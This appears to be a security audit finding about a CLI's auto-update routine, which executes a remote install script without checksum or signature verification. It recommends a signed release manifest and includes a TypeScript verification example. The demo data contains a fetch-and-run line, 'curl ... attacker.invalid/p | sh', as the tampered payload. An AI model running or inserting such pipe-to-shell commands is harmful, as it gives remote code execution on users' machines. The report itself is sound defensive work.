Summary
The auto-update mechanism in packages/cli/src/update-check.ts downloads and executes a remote install script without cryptographic verification.
Location
- File: packages/cli/src/update-check.ts
- Function: performAutoUpdate()
- Lines: 279-345
Vulnerability
The function fetches the install script via HTTPS from a CDN and executes it directly:
const scriptBytes = executor.execFileSync('curl', ['--proto', '=https', '-fsSL', installUrl], ...);
// ... writes to temp file, then executes via bash/PowerShell
HTTPS with certificate validation protects the bytes in transit against an ordinary on-path attacker, and `--proto =https` refuses a plain-http URL, so a downgrade of the transport itself is not the realistic concern. What is missing is any integrity check on the script (checksum or signature) that is independent of the transport. Whoever can make installUrl serve different bytes gets code execution on every machine that auto-updates: a compromised CDN account or origin, a domain or DNS takeover that lasts long enough to obtain a valid certificate, or a TLS interception root already present in the user's trust store. Note that `-L` also follows redirects, so a compromised CDN configuration can point the download at any host it likes.
Impact
- An attacker who controls what installUrl serves can execute arbitrary code with the privileges of the user running the CLI, on every installation that updates
- The update runs automatically when SPAWN_AUTO_UPDATE=1, with no prompt, so the user has no opportunity to inspect the script before it executes
Recommendation
- Publish a release manifest containing the SHA-256 of the install script, and verify the downloaded bytes against it before writing or executing anything
- Sign the manifest (a detached Ed25519/minisign or GPG signature) and verify it with a public key embedded in the CLI itself; an unsigned manifest fetched from the same CDN adds nothing, because whoever replaces the script can replace the manifest too
- Verify the exact bytes that will be executed: hash the buffer in memory, or write it to a private temp file, hash that file and execute that same file, so there is no check-then-run race
- Certificate pinning or Certificate Transparency monitoring can be layered on top, but pinning breaks when the CDN rotates certificates and CT is detective rather than preventive, so neither replaces signature verification
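An added example (not code from the project) of the verification step the recommendations describe, in TypeScript since that is the language of update-check.ts. The manifest layout, the function names and the demo script are assumptions; in the CLI the public key would be a pinned constant compiled into the binary, and the key pair below is generated only so the example runs offline. It also walks through the two tampering cases the finding is about: a swapped script with the original manifest, and a swapped script with a re-issued manifest.

```typescript
import { Buffer } from 'node:buffer';
import { createHash, generateKeyPairSync, sign, verify, timingSafeEqual, KeyObject } from 'node:crypto';

// Assumed manifest layout: one JSON document per release, served beside the script.
interface ReleaseManifest {
  version: string;
  script: string;   // file name the hash refers to, e.g. "install.sh"
  sha256: string;   // lowercase hex SHA-256 of the script bytes
}

function sha256Hex(data: Buffer): string {
  return createHash('sha256').update(data).digest('hex');
}

// Check the manifest signature with the pinned release key, then the script hash.
// Returns null when the script may be executed, otherwise the reason for refusing.
// Both checks run on the bytes already in memory; the caller must execute those
// same bytes (or the temp file it hashed), never a re-fetched copy.
function verifyInstallScript(
  manifestJson: Buffer,
  manifestSig: Buffer,
  scriptBytes: Buffer,
  releaseKey: KeyObject,
): string | null {
  // Ed25519: the algorithm argument is null and the signature covers the raw manifest bytes.
  if (!verify(null, manifestJson, releaseKey, manifestSig)) {
    return 'manifest signature invalid';
  }
  let manifest: ReleaseManifest;
  try {
    manifest = JSON.parse(manifestJson.toString('utf8'));
  } catch {
    return 'manifest is not valid JSON';
  }
  if (typeof manifest.sha256 !== 'string' || !/^[0-9a-f]{64}$/.test(manifest.sha256)) {
    return 'manifest has no usable sha256';
  }
  const expected = Buffer.from(manifest.sha256, 'hex');
  const actual = Buffer.from(sha256Hex(scriptBytes), 'hex');
  // Both buffers are exactly 32 bytes here, so timingSafeEqual cannot throw on length.
  if (!timingSafeEqual(expected, actual)) {
    return 'script hash mismatch';
  }
  return null;
}

// --- Constructed demo data; none of this comes from the project. ---
// In the CLI the public key is a pinned constant; the pair is generated here only
// so that the example is self-contained.
const { publicKey: releaseKey, privateKey: signingKey } = generateKeyPairSync('ed25519');
const script = Buffer.from('#!/bin/sh\necho "constructed install script"\n');
const manifest: ReleaseManifest = { version: '1.2.3', script: 'install.sh', sha256: sha256Hex(script) };
const manifestJson = Buffer.from(JSON.stringify(manifest));
const manifestSig = sign(null, manifestJson, signingKey);

// Three scenarios: the genuine release, a CDN that swaps the script but still serves
// the original manifest, and a CDN that swaps both (it cannot produce a valid signature
// because it does not hold the release private key).
function demo(): { genuine: string | null; swappedScript: string | null; swappedBoth: string | null } {
  const tampered = Buffer.concat([script, Buffer.from('curl -fsSL https://attacker.invalid/p | sh\n')]);
  const forgedManifest = Buffer.from(JSON.stringify({ ...manifest, sha256: sha256Hex(tampered) }));
  return {
    genuine: verifyInstallScript(manifestJson, manifestSig, script, releaseKey),
    swappedScript: verifyInstallScript(manifestJson, manifestSig, tampered, releaseKey),
    swappedBoth: verifyInstallScript(forgedManifest, manifestSig, tampered, releaseKey),
  };
}

console.log(demo());
```

The order of the checks matters: the signature is checked before the manifest is parsed, so unsigned input never reaches the JSON parser, and the hash is checked on the same buffer that performAutoUpdate() would go on to write and execute.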